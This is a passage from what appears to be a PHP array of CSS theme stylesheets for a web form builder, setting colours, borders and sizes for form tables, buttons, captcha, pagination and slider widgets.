!important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\nborder: 2px inset !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px\n}    \n.page_deactive\n{\ncolor:black !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\ncolor:white !important;\nborder: 1px solid white !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#84857D !important;\nbox-shadow: 0px 0px 3px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#000 !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:3px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:#E0DEE1 !important;\nborder-radius:2px !important;\ntext-align: left !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#84857D !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#84857D !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\npadding-left: 35px !important;\nmargin-right: -16px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\npadding: 0 4px;\r\n}\r\n\r\n.wdform_grading label\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading input:focus\r\n{\r\nborder:2px inset;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#C9C9C9 !important;\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-range\r\n{\r\nbackground:#C9C9C9;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider-handle\r\n{\r\nbackground:#C9C9C9;\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#000000;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#E0DEE1;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #999;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #999;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#000000;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n}\r\n\r\n\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #ABADB3;\r\nmargin:5px 7px;\r\n}",
      "29" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table{\n	width:initial !important;\n	text-align:left;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n        text-align:left;\n}\n.wdform_table1 td{\n	border:inherit !important;\n	padding:inherit !important;\n	text-align:left;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:0px !important;\n		padding-bottom:0px !important;\n		padding-left:inherit;\n		padding-right:inherit;\n		display: inline !important;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#ffffff !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n//display: table !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 6px !important;\nborder-collapse:separate !important;\nwidth: 700px !important;\n}\n.wdform_tbody2>tr\n{\n}\n.toolbar_padding\n{\nbackground-color:#FE5E5E !important;\ntext-align:left !important;\npadding:6px !important;\n}\n.wdform_table2>tbody>tr>td\n{\nbackground-color:#DB3B3B !important;\ntext-align:center;\npadding:6px !important;\nwidth:20% !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nbackground-color:#ffffff !important;\nwidth:100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:19px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\npadding:0px !important;\nmargin:0px !important;\nheight:16px !important;\nborder: 2px inset !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 2px inset !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000000 !important;\nfont-weight:bolder !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 20px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder: 2px inset !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\nborder: 2px inset !important;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px\n}    \n.page_deactive\n{\ncolor:black !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\ncolor:white !important;\nborder: 1px solid white !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#E84848 !important;\nbox-shadow: 0px 0px 3px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#000 !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:3px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:#FE5E5E !important;\nborder-radius:2px !important;\ntext-align: left !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E84848 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E84848 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E84848 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#E84848 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#E84848 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\npadding-left: 35px !important;\nmargin-right: -16px !important;\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\npadding:0 4px;\r\n}\r\n\r\n.wdform_grading input:focus\r\n{\r\nborder:2px inset;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\n}\r\n\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #999;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#FFC486;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #999;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #999;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:1px solid #CCC;\r\nmargin:5px 7px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "30" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table{\n	width:initial !important;\n	text-align:left;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n        text-align:left;\n}\n.wdform_table1 td{\n	border:inherit !important;\n	padding:inherit !important;\n	text-align:left;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:0px !important;\n		padding-bottom:0px !important;\n		padding-left:inherit;\n		padding-right:inherit;\n		display: inline !important;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#ffffff !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n//display: table !important;\n}\n.wdform_table2\n{\npadding-right:30px  !important;\npadding-left:30px  !important;\nfloat:left !important;\nborder-spacing: 6px !important;\nborder-collapse:separate  !important;\nwidth: 700px !important;\n}\n.wdform_tbody2>tr\n{\n}\n.toolbar_padding\n{\nbackground-color:#FFC486 !important;\ntext-align:left  !important;\npadding:6px  !important;\n}\n.wdform_table2>tbody>tr>td\n{\nbackground-color:#FFA746 !important;\ntext-align:center;\npadding:6px !important;\nwidth:20% !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px  !important;\npadding-left:20px  !important;\nbackground-color:#ffffff !important;\nwidth:100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:19px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder-width: 1px !important;\npadding:0px !important;\nmargin:0px !important;\nheight:16px !important;\nborder: 2px inset !important;\n}\n.time_box\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 2px inset !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000000 !important;\nfont-weight:bolder !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nheight: 20px !important;\nmargin:0 !important;\npadding:0\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder: 2px inset !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nmargin: 0px !important;\npadding: 0px !important;\nborder-radius:0px !important;\nheight:16px;\nborder: 2px inset !important;\n}\n.required\n{\nborder:none !important;\ncolor:blue\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 0px !important;\npadding: 0px\n}    \n.page_deactive\n{\ncolor:black !important;\nborder: 1px solid black !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#DBDBDB !important;\n}\n.page_active\n{\ncolor:white !important;\nborder: 1px solid white !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#FFB365 !important;\nbox-shadow: 0px 0px 3px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#000 !important;\nborder-radius:30px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right  !important; \n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\npadding:3px !important;\nborder:1px solid black !important;\nwidth:100% !important;\nbackground-color:#FFC486 !important;\nborder-radius:2px !important;\ntext-align: left  !important; \n}\n.page_numbers\n{\nfont-size:11px !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#FFB365 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#FFB365 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#FFB365 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#FFB365 !important;\nborder: 2px solid #ffffff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#FFA746 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\nmargin-right: -53px !important;\ntext-align:center  !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#7EF2FF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#7EF2FF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\nmargin:0 0 3px;\r\npadding: 0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder-radius:0px !important;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:0px !important;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#7EF2FF;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#7EF2FF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#2D2C28;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FFFFFF;\r\nmargin-right:3px !important;\r\nborder-radius:0px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #999;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\n\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#7EF2FF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input\r\n{\r\ncolor:#000000;\r\nbackground-color:#FFFFFF;\r\nborder:none;\r\nmargin:5px 7px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#7EF2F;\r\n}",
      "31" => ".page_numbers {\nmargin-left: 10px;\n}\n .page_percentage_deactive,.page_percentage_deactive * {\nword-wrap: normal !important;\n-moz-box-sizing: content-box !important;\n-webkit-box-sizing: content-box !important;\nbox-sizing: content-box !important;\n}\n .wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:inherit !important;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table{\n	width:initial !important;\n	text-align:left;\n}\n.wdform_table2 td{\n	vertical-align:top !important;\n        text-align:left;\n}\n.wdform_table1 td{\n	border:inherit !important;\n	padding:inherit !important;\n	text-align:left;\n	vertical-align:middle;\n	margin:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		color:#000;\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:0px !important;\n		padding-bottom:0px !important;\n		padding-left:inherit;\n		padding-right:inherit;\n		display: inline !important;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n	font-size:inherit !important; \n	height:inherit !important;\n}\n.wdform_table1 button{\n	padding:inherit !important;\n	line-height:1 !important;\n	background-image:none !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#ffffff !important;\nborder:0px solid black !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n//display: table !important;\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 6px !important;\nborder-collapse:separate !important;\nwidth: 700px !important;\n}\n.wdform_tbody2>tr\n{\n}\n.toolbar_padding\n{\nbackground-color:#2D2C28 !important;\ntext-align:left !important;\npadding:6px !important;\n}\n.wdform_table2>tbody>tr>td\n{\nbackground-color:#000000 !important;\ntext-align:center;\npadding:6px !important;\nwidth:20% !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nbackground-color:#ffffff !important;\nwidth:100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\nborder: 2px inset !important;\n}\n.wdform_address select\n{\nborder-radius:0px 